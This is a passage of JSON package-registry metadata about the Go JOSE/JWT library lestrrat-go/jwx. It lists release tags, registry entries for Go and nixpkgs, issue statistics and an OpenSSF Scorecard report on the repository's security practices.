nd":"commit","published_at":"2020-05-03T03:30:16.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.0.0","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.0/manifests"},{"name":"v0.9.2","sha":"1402056cec6d7faba7454657f7bf180b2b1f14d5","kind":"commit","published_at":"2020-04-13T03:20:24.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v0.9.2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v0.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v0.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v0.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v0.9.2/manifests"},{"name":"v0.9.1","sha":"041c40732a8843e7d4a0b7cd2cffbe2f339f92ca","kind":"commit","published_at":"2020-02-26T22:25:54.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v0.9.1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v0.9.1/manifests"},{"name":"v0.9.0","sha":"5d60d87d07ddea9874404944870bec81aabcf574","kind":"commit","published_at":"2019-05-20T02:55:45.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v0.9.0","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v0.9.0/manifests"}]},"repo_metadata_updated_at":"2026-03-25T17:02:57.945Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":9.345852080216646,"dependent_packages_count":6.999148183520997,"stargazers_count":1.0929961382075044,"forks_count":1.4345083313038627,"average":4.718126183312252},"purl":"pkg:golang/github.com/lestrrat-go/jwx/cmd/jwx","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/go/github.com/lestrrat-go/jwx/cmd/jwx","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/go/github.com/lestrrat-go/jwx/cmd/jwx","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/go/github.com/lestrrat-go/jwx/cmd/jwx/dependencies","status":null,"funding_links":["https://github.com/sponsors/lestrrat"],"critical":null,"issue_metadata":{"last_synced_at":"2026-03-23T10:02:05.442Z","issues_count":94,"pull_requests_count":747,"avg_time_to_close_issue":3354245.694117647,"avg_time_to_close_pull_request":304118.8680351906,"issues_closed_count":85,"pull_requests_closed_count":682,"pull_request_authors_count":27,"issue_authors_count":64,"avg_comments_per_issue":3.978723404255319,"avg_comments_per_pull_request":0.5903614457831325,"merged_pull_requests_count":577,"bot_issues_count":1,"bot_pull_requests_count":372,"past_year_issues_count":13,"past_year_pull_requests_count":196,"past_year_avg_time_to_close_issue":210964.44444444444,"past_year_avg_time_to_close_pull_request":191349.9512195122,"past_year_issues_closed_count":9,"past_year_pull_requests_closed_count":164,"past_year_pull_request_authors_count":10,"past_year_issue_authors_count":11,"past_year_avg_comments_per_issue":2.923076923076923,"past_year_avg_comments_per_pull_request":0.2857142857142857,"past_year_bot_issues_count":1,"past_year_bot_pull_requests_count":80,"past_year_merged_pull_requests_count":143,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/issues","maintainers":[{"login":"lestrrat","count":345,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lestrrat"}],"active_maintainers":[{"login":"lestrrat","count":104,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lestrrat"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fcmd%2Fjwx/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fcmd%2Fjwx/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fcmd%2Fjwx/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fcmd%2Fjwx/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fcmd%2Fjwx/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fcmd%2Fjwx/codemeta","maintainers":[],"registry":{"name":"proxy.golang.org","url":"https://proxy.golang.org","ecosystem":"go","default":true,"packages_count":2168948,"maintainers_count":0,"namespaces_count":792747,"keywords_count":113213,"github":"golang","metadata":{"funded_packages_count":53976},"icon_url":"https://github.com/golang.png","created_at":"2022-04-04T15:19:22.939Z","updated_at":"2026-06-10T05:03:23.672Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/namespaces"}},{"id":13054853,"name":"jwx","ecosystem":"nixpkgs","description":" Implementation of various JWx (Javascript Object Signing and Encryption/JOSE) technologies","homepage":"https://github.com/lestrrat-go/jwx","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/lestrrat-go/jwx","keywords_array":[],"namespace":null,"versions_count":1,"first_release_published_at":"2026-02-01T16:25:57.646Z","latest_release_published_at":"2026-02-01T16:25:57.646Z","latest_release_number":"2.1.1","last_synced_at":"2026-04-12T18:06:41.692Z","created_at":"2026-02-01T16:25:55.572Z","updated_at":"2026-04-12T18:31:14.983Z","registry_url":"https://search.nixos.org/packages?channel=24.11\u0026query=jwx","install_command":"nix-env -iA nixpkgs.jwx","documentation_url":"https://github.com/NixOS/nixpkgs/blob/nixos-24.11/pkgs/by-name/jw/jwx/package.nix#L23","metadata":{"nix_attribute":"jwx-2.1.1","position":"pkgs/by-name/jw/jwx/package.nix:23","platforms":["x86_64-darwin","i686-darwin","aarch64-darwin","armv7a-darwin","aarch64-linux","armv5tel-linux","armv6l-linux","armv7a-linux","armv7l-linux","i686-linux","loongarch64-linux","m68k-linux","microblaze-linux","microblazeel-linux","mips-linux","mips64-linux","mips64el-linux","mipsel-linux","powerpc64-linux","powerpc64le-linux","riscv32-linux","riscv64-linux","s390-linux","s390x-linux","x86_64-linux","wasm64-wasi","wasm32-wasi","i686-freebsd","x86_64-freebsd"],"broken":false,"insecure":false,"unfree":false,"outputs":["out"]},"repo_metadata":{"id":37406150,"uuid":"45516769","full_name":"lestrrat-go/jwx","owner":"lestrrat-go","description":"Complete implementation of JWx (Javascript Object Signing and Encryption/JOSE) technologies for Go. #golang #jwt #jws #jwk #jwe","archived":false,"fork":false,"pushed_at":"2026-03-23T20:34:17.000Z","size":21587,"stargazers_count":2339,"open_issues_count":5,"forks_count":192,"subscribers_count":24,"default_branch":"develop/v3","last_synced_at":"2026-03-24T15:23:41.313Z","etag":null,"topics":["go","golang","jwe","jwk","jws","jwt","oidc"],"latest_commit_sha":null,"homepage":"","language":"Go","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/lestrrat-go.png","metadata":{"files":{"readme":"README.md","changelog":"Changes","contributing":".github/CONTRIBUTING.md","funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":"AGENTS.md","dco":null,"cla":null},"funding":{"github":["lestrrat"],"patreon":null,"open_collective":null,"ko_fi":null,"tidelift":null,"community_bridge":null,"liberapay":null,"issuehunt":null,"otechie":null,"custom":null}},"created_at":"2015-11-04T05:12:52.000Z","updated_at":"2026-03-23T20:34:22.000Z","dependencies_parsed_at":"2023-09-23T13:31:33.054Z","dependency_job_id":"8122a1a4-053c-4ee5-9b97-9972c16335ef","html_url":"https://github.com/lestrrat-go/jwx","commit_stats":{"total_commits":1692,"total_committers":66,"mean_commits":"25.636363636363637","dds":0.3427895981087471,"last_synced_commit":"f0730766974533dcd9e5f8074a0adfcc471b0f0a"},"previous_names":["lestrrat/jwx"],"tags_count":106,"template":false,"template_full_name":null,"purl":"pkg:github/lestrrat-go/jwx","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/lestrrat-go","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/refs/heads/develop/v3","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/sbom","scorecard":{"id":371885,"data":{"date":"2025-08-11","repo":{"name":"github.com/lestrrat-go/jwx","commit":"568c2c84f11f47f53126b44bf3a3d76993038cba"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":6.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 7 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":0,"reason":"Found 0/23 approved changesets -- score normalized to 0","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Info: jobLevel 'actions' permission set to 'read': .github/workflows/codeql.yml:28","Info: jobLevel 'contents' permission set to 'read': .github/workflows/codeql.yml:29","Warn: no topLevel permission defined: .github/workflows/assign-issue.yml:1","Warn: no topLevel permission defined: .github/workflows/assign-pr.yml:1","Warn: no topLevel permission defined: .github/workflows/autodoc.yml:1","Warn: no topLevel permission defined: .github/workflows/benchmark.yml:1","Warn: no topLevel permission defined: .github/workflows/ci.yml:1","Warn: no topLevel permission defined: .github/workflows/codeql.yml:1","Warn: no topLevel permission defined: .github/workflows/dependabot.yml:1","Warn: no topLevel permission defined: .github/workflows/lint.yml:1","Warn: no topLevel permission defined: .github/workflows/smoke.yml:1","Warn: no topLevel permission defined: .github/workflows/stale.yml:1","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"Pinned-Dependencies","score":6,"reason":"dependency not pinned by hash detected -- score normalized to 6","details":["Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:45: update your workflow using https://app.stepsecurity.io/secureworkflow/lestrrat-go/jwx/ci.yml/develop/v3?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/codeql.yml:47: update your workflow using https://app.stepsecurity.io/secureworkflow/lestrrat-go/jwx/codeql.yml/develop/v3?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/codeql.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/lestrrat-go/jwx/codeql.yml/develop/v3?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/codeql.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/lestrrat-go/jwx/codeql.yml/develop/v3?enable=pin","Warn: goCommand not pinned by hash: .github/workflows/benchmark.yml:33","Warn: goCommand not pinned by hash: .github/workflows/ci.yml:36","Warn: goCommand not pinned by hash: .github/workflows/smoke.yml:42","Warn: goCommand not pinned by hash: .github/workflows/smoke.yml:44","Info:  15 out of  18 GitHub-owned GitHubAction dependencies pinned","Info:   4 out of   5 third-party GitHubAction dependencies pinned","Info:   2 out of   6 goCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"SAST","score":9,"reason":"SAST tool detected but not run on all commits","details":["Info: SAST configuration detected: CodeQL","Warn: 24 commits out of 27 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T13:10:24.800Z","repository_id":37406150,"created_at":"2025-08-18T13:10:24.800Z","updated_at":"2025-08-18T13:10:24.800Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":30897961,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-03-24T08:58:18.477Z","status":"ssl_error","status_checked_at":"2026-03-24T08:57:59.595Z","response_time":106,"last_error":"SSL_read: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"repo_metadata_updated_at":"2026-03-25T17:02:36.773Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":0.0,"stargazers_count":0.3238156136510825,"forks_count":0.3598862136527221,"docker_downloads_count":null,"average":0.17092545682595117},"purl":"pkg:nix/jwx?channel=24.11\u0026repository_url=https://channels.nixos.org/nixos-24.11","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/nixpkgs/jwx","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/nixpkgs/jwx","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/nixpkgs/jwx/dependencies","status":null,"funding_links":["https://github.com/sponsors/lestrrat"],"critical":null,"issue_metadata":{"last_synced_at":"2026-03-23T10:02:05.442Z","issues_count":94,"pull_requests_count":747,"avg_time_to_close_issue":3354245.694117647,"avg_time_to_close_pull_request":304118.8680351906,"issues_closed_count":85,"pull_requests_closed_count":682,"pull_request_authors_count":27,"issue_authors_count":64,"avg_comments_per_issue":3.978723404255319,"avg_comments_per_pull_request":0.5903614457831325,"merged_pull_requests_count":577,"bot_issues_count":1,"bot_pull_requests_count":372,"past_year_issues_count":13,"past_year_pull_requests_count":196,"past_year_avg_time_to_close_issue":210964.44444444444,"past_year_avg_time_to_close_pull_request":191349.9512195122,"past_year_issues_closed_count":9,"past_year_pull_requests_closed_count":164,"past_year_pull_request_authors_count":10,"past_year_issue_authors_count":11,"past_year_avg_comments_per_issue":2.923076923076923,"past_year_avg_comments_per_pull_request":0.2857142857142857,"past_year_bot_issues_count":1,"past_year_bot_pull_requests_count":80,"past_year_merged_pull_requests_count":143,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/issues","maintainers":[{"login":"lestrrat","count":345,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lestrrat"}],"active_maintainers":[{"login":"lestrrat","count":104,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lestrrat"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.11/packages/jwx/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.11/packages/jwx/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.11/packages/jwx/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.11/packages/jwx/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.11/packages/jwx/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.11/packages/jwx/codemeta","maintainers":[{"uuid":"flokli","login":null,"name":"Florian Klink","email":"flokli@flokli.de","url":"https://github.com/flokli","packages_count":84,"html_url":null,"role":null,"created_at":"2026-03-04T03:15:31.784Z","updated_at":"2026-03-04T03:15:31.784Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.11/maintainers/flokli/packages"},{"uuid":"arianvp","login":null,"name":"Arian van Putten","email":"arian.vanputten@gmail.com","url":"https://github.com/arianvp","packages_count":38,"html_url":null,"role":null,"created_at":"2026-03-04T03:15:31.731Z","updated_at":"2026-03-04T03:15:31.731Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.11/maintainers/arianvp/packages"}],"registry":{"name":"nixpkgs-24.11","url":"https://channels.nixos.org/nixos-24.11","ecosystem":"nixpkgs","default":false,"packages_count":121983,"maintainers_count":3777,"namespaces_count":0,"keywords_count":739,"github":"NixOS","metadata":{"funded_packages_count":283},"icon_url":"https://github.com/NixOS.png","created_at":"2026-01-25T22:30:53.059Z","updated_at":"2026-06-10T05:16:24.031Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.11/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.11/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.11/namespaces"}},{"id":4260451,"name":"github.com/lestrrat-go/jwx/internal/cmd/genreadfile","ecosystem":"go","description":"","homepage":"https://github.com/lestrrat-go/jwx","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/lestrrat-go/jwx","keywords_array":[],"namespace":"github.com/lestrrat-go/jwx/internal/cmd","versions_count":0,"first_release_published_at":null,"latest_release_published_at":"2026-03-02T16:22:38.645Z","latest_release_number":null,"last_synced_at":"2026-05-01T07:33:47.621Z","created_at":"2022-04-13T00:49:00.780Z","updated_at":"2026-05-01T07:33:47.621Z","registry_url":"https://pkg.go.dev/github.com/lestrrat-go/jwx/internal/cmd/genreadfile","install_command":"go get github.com/lestrrat-go/jwx/internal/cmd/genreadfile","documentation_url":"https://pkg.go.dev/github.com/lestrrat-go/jwx/internal/cmd/genreadfile#section-documentation","metadata":{},"repo_metadata":{"id":37406150,"uuid":"45516769","full_name":"lestrrat-go/jwx","owner":"lestrrat-go","description":"Complete implementation of JWx (Javascript Object Signing and Encryption/JOSE) technologies for Go. #golang #jwt #jws #jwk #jwe","archived":false,"fork":false,"pushed_at":"2026-03-23T20:34:17.000Z","size":21587,"stargazers_count":2339,"open_issues_count":5,"forks_count":192,"subscribers_count":24,"default_branch":"develop/v3","last_synced_at":"2026-03-24T15:23:41.313Z","etag":null,"topics":["go","golang","jwe","jwk","jws","jwt","oidc"],"latest_commit_sha":null,"homepage":"","language":"Go","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/lestrrat-go.png","metadata":{"files":{"readme":"README.md","changelog":"Changes","contributing":".github/CONTRIBUTING.md","funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":"AGENTS.md","dco":null,"cla":null},"funding":{"github":["lestrrat"],"patreon":null,"open_collective":null,"ko_fi":null,"tidelift":null,"community_bridge":null,"liberapay":null,"issuehunt":null,"otechie":null,"custom":null}},"created_at":"2015-11-04T05:12:52.000Z","updated_at":"2026-03-23T20:34:22.000Z","dependencies_parsed_at":"2023-09-23T13:31:33.054Z","dependency_job_id":"8122a1a4-053c-4ee5-9b97-9972c16335ef","html_url":"https://github.com/lestrrat-go/jwx","commit_stats":{"total_commits":1692,"total_committers":66,"mean_commits":"25.636363636363637","dds":0.3427895981087471,"last_synced_commit":"f0730766974533dcd9e5f8074a0adfcc471b0f0a"},"previous_names":["lestrrat/jwx"],"tags_count":106,"template":false,"template_full_name":null,"purl":"pkg:github/lestrrat-go/jwx","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/lestrrat-go","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/refs/heads/develop/v3","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/sbom","scorecard":{"id":371885,"data":{"date":"2025-08-11","repo":{"name":"github.com/lestrrat-go/jwx","commit":"568c2c84f11f47f53126b44bf3a3d76993038cba"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":6.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 7 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":0,"reason":"Found 0/23 approved changesets -- score normalized to 0","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Info: jobLevel 'actions' permission set to 'read': .github/workflows/codeql.yml:28","Info: jobLevel 'contents' permission set to 'read': .github/workflows/codeql.yml:29","Warn: no topLevel permission defined: .github/workflows/assign-issue.yml:1","Warn: no topLevel permission defined: .github/workflows/assign-pr.yml:1","Warn: no topLevel permission defined: .github/workflows/autodoc.yml:1","Warn: no topLevel permission defined: .github/workflows/benchmark.yml:1","Warn: no topLevel permission defined: .github/workflows/ci.yml:1","Warn: no topLevel permission defined: .github/workflows/codeql.yml:1","Warn: no topLevel permission defined: .github/workflows/dependabot.yml:1","Warn: no topLevel permission defined: .github/workflows/lint.yml:1","Warn: no topLevel permission defined: .github/workflows/smoke.yml:1","Warn: no topLevel permission defined: .github/workflows/stale.yml:1","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a 